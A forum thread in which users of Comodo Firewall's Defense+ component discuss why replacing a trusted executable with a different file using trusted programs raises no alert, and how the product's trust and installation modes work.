Replaced .exe get automatically same rights as previous .exe in paranoid mode

The example is: replace hwmonitor.exe (from www.cpuid.com) using winrar (trusted app).
The defense+ part is set to paranoid, not in installation mode.

I replace hwmonitor.exe v1.10 (trusted app) wiith hwmonitor.exe v1.11 (unkown app), no warning, that is correct since winrar and explorer.exe are trusted apps.

Now I start hwmonitor v1.11, but I get no warning, I get no question whether that app is trusted etc, although the app changed!

The supposed behavior (as I got used to from Kerio/Sunbelt firewall, which is simply too unstable on a quad core):
“The application got replaced, use rules from the prevoius version yes/no ?” and if I choose no, comodo should then treat the app like it is unknown and ask the typical questions.

From my point of view this is a security risk, especially since I am always running in paranoid mode.

If this is a “by design” thing it should be changed. If it is a config thing, tell me what i have to change to get that behavior to ask whether a replaced app is accepted or not, it should ask upon start of that application, not during the replacing action.

regards,

Joachim

That is because hwmonitor v1.11 is a stand alone application and is not installed so i think beings it is portable and has no ties to the system registry that it can’t actively be monitored. MODS if I’m wrong feel free to jump in here.

That it is not “installed” is right, the file was replaced in paranoid mode.
Comodo does not seem to detect that the file got replaced, it only seems to store the path and name of the executable, not a CRC, not even the file size or last modified time. I know that Kerio/Sunbelt stores CRC values.

Not recognizing a replaced .exe file as a different one than the original one is a BIG minus on the security side, it leaves the door wide open for .exe files to be hacked after I set the “trusted app” bit. Everything else in that firewall is better than with Kerio/Sunbelt.

The only way such replaced executables should be automatically allowed is when they got replaced while being in installation mode (i.e. comodo firewall should update the crc value of replaced .exe files during installation mode).

Set

I just downloaded hwmonitor, and Defense+ is warning me about hwmonitor.exe is trying to access the Service Control Manager, to a protected COM interface, to svchost.exe in memory, and to the screen… so if it doesn’t ask, it should be because it is not detecting there was a version change…

Now, while it seems a risky feature (or undesired bug?), we must remember Defense+ probably would have blocked an attempt to tamper the original file… the file is not the same because the user changed it, using trusted apps.

Maybe it is a different focus… other security programs allow the malware to change our files, and then they say “hey, the file is not the same… do you want to allow…?”, and defense+ seems to focus in preventing the files to be changed, making unnecesary to check the file version. However, maybe it would be safer to do both things, just in case… and after all, Paranoid mode should be… paranoid.

Agree,that is a threat.
V3 does not have hash functions to monitor the change.

You missed the point, hwmonitor.exe v 1.10 is listed as “trusted application”, it needs a lot of rights to read the temperatures and voltages and etc out of the system, and/or directly from the chips on board.

The point is: I copy version 1.11 over version 1.10, and comodo doesn’t notice that it is a different application, it does trust v 1.11 just like it trusted v 1.10 without asking. And: I am in Paranoid mode, not Install mode!

Kerio asks “File got replaced, accept new file ?”, and it asks that for every copy of hwmonitor.exe on my system seperately (like the one in %PROGRAMDIR%, the one on D:, the one on my network drive, etc).

I know that very precisely since I used Kerio/Sunbelt for many years, I am using Comodo for about 3 weeks now.
Please, this is a serious security issue to not notice changed app.

Set

My point is hwmonitor is not being automatically recognised… remember CFP is supposed to check apps against a database of known apps…

Checked against a data base of known safe apps! (R)

If you are running in Paranoid Mode like I am you do not get changed file alerts like Kerio.
I did run Kerio since 2.4 changed CPF3 over a year ago because of Vista still run on my partners computer so I know the alerts are not the same on CPF3.
Example Antivirus you have set all alerts to remember for normal virus update when you receive a major program update you will receive new alerts for folders registry etc. unless you have given permisson to allow the app. to change all folders/registry entries.
Dennis
EDIT Reading your first post again you have set winrar as a Trusted App. you will not get any alerts or very few for Trusted Apps.
If you want more alerts when first install CPF3 set to Paranoid mode delete all entries apart from comodo’s change Explorer to ask for all this is one of the auto entries you get in Paranoid Mode and do not set anything as Trusted.
You will get plenty of alerts and it is very easy to lockup your computer so have fun ;D
Or limited alerts which most people want use preset rules run in Training mode for very short period and then set to Safe Mode for both, and set the apps you sure about to Trusted.

Old generation firewalls didn’t have a full featured hips and thus it was not possible to monitor file integrity in realtime.
For this reason when a firewall rule was created that rule was bound to a file hash signature.

When that app attepted a connection the old firewall checked if the file were changed meantime comparing the hash signature of the launched app with the one previously stored.

If those signature did not match then the old firewall triggered an alert.

V3 is different since D+ alerts everytime a protected file (eg all executables) is written (or moved).
Those alerts you get the same moment those files are created/moved are to supersede old hash checks.

Since explorer.exe is a Trusted application and CFP V3 protect you from any indirect tampering of explorer.exe you’ll not get those protected file alerts.

So for example if you have firefox.exe and you previously created a policy to allow it to connect to the internet,
If you rename leaktest.exe to firefox.exe and replace the real firefox.exe with it you won’t get any alert and the renamed leaktest.exe will be allowed to connect to the internet.
The same thing happens for HIPS policies.

This will happen because you used explorer.exe that is a Trusted application.
If any other untrusted app attempts to move/copy/create a file you’ll get an alert.

Thank you for exactly answering what I asked !
Now that I know the design behind this I feel a lot safer again, and it makes a lot sense that trusted app is defined that way. This also means: I have to go through the predefined policies of defense+ again to see more exactely which does what.

This leaves only one Question:
The “Installation mode” is not listed as one of the predefined policy, what are the exact settings for Installation mode? I guess replace .exe just like the normal trusted app and so on.
A link to “Read this page” would be enough since I bet I am not the first one asking that.

One feature I would like to see: When a new app comes up (especially when selecting “treat as installer/updater”) is it possible to set a time-based rule instead of just selecting “remember my choice”? like: apply this rule for the app for 1 hour/10 hours, and then delete the app entry in the database once the time has passed. It would spare me from cleaning the database manually from time to time from those usually then useless installer entries.

Set

Installation mode is to be used with installer/updater policy. It should be activated only to install Trusted applications and if will suppress every alert.

Ref: http://wiki.comodo.com/CFP3/Help_Guide/Defense_Task_Center/Defense_Settings#.27General_Settings.27_tab

If you don’t enable “Remember my choice” the rule/policy will be active until that app is terminated.

This means that if you allow something for explorer.exe you should terminate it manually (using Task Manager) or wait until the next reboot.
If you apply a rule to a leaktest witout marking it to be remembered you’ll be asked again next time you start that leaktest.

I checked and searched for following:
Giving an application rights just like trusted application, but STILL being asked upon start of a replaced program.
I search for a setting that allows open-create and open-modify of .exe .com etc, but does NOT update the stored hash of the modified programs.

It is like limited trust, what happens if the “trusted” program runs havoc (i.e. due to a plugin in the trusted program which behaves like a virus), modifies tons of programs, and I don’t notice.
This between way of policy is missing.
A lot of programs need “trusted” rights, like Filemanagers, Adobe Updaters, which cannot copy a .exe file when they are not trusted. But it shouldn’t updating the hash of the copied programs not yet, ask extra after replacement and upon start of the replaced program.

Or other way to say: Either I set “trusted program” or “Installer” and it can modify anything it wants in the whole system (and not only what I want) without control due to auto-update-hashes, or the program is not trusted and I cannot even use a filemanager.

The “trusted program” and “Install mode” the way they are now is perfect for Windows updates, or Windows Service Packs, Virus scanner and other system-near stuf. For all other things the “Limited trust” with still asking after replacing a .exe file is what paranoid-mode should be, maybe even what “safe mode” should be. I want to control what they replace, and I cannot right now, for me I would impose “limited trust” even to explorer.exe or my winrar.exe example to ask me “File replaced, accept new version?” AFTER I copied it.

So, now that I said four times basically the same things just in different word in one post, please help!

How can I set such a policy, currently it seems impossible “by design”.

Set

PS: Yes, yes, I am a control freak and paranoid, the better you know computers, the more you get that way.

PS2: Your wiki on http://wiki.comodo.com/CFP3/Help_Guide/Defense_Task_Center/Defense_Settings#.27General_Settings.27_tab says that DNS recursion can be used as an attack vector. It can also be used as VPN, altough this is kind of sick. There are test implementations which are very good functional to create a full tunnel (not nessecarily encrypted) by only using DNS requests, without having any gateway configured at the machines using that sick tunnel way. Since DNS is required for Active Directory usually the AD-Server doing the DNS-Server also does forwarding DNS to an external Server for unknown domains (else nobody could surf or get Windows updates), so this attack vector is normally open.
See http://www.heise.de/ct/inhverz/suche?q=dns+tunnel&search_submit=Suchen&rm=search (sorry, German Magazine, and the online version of that article costs money, I still have that issue on paper here).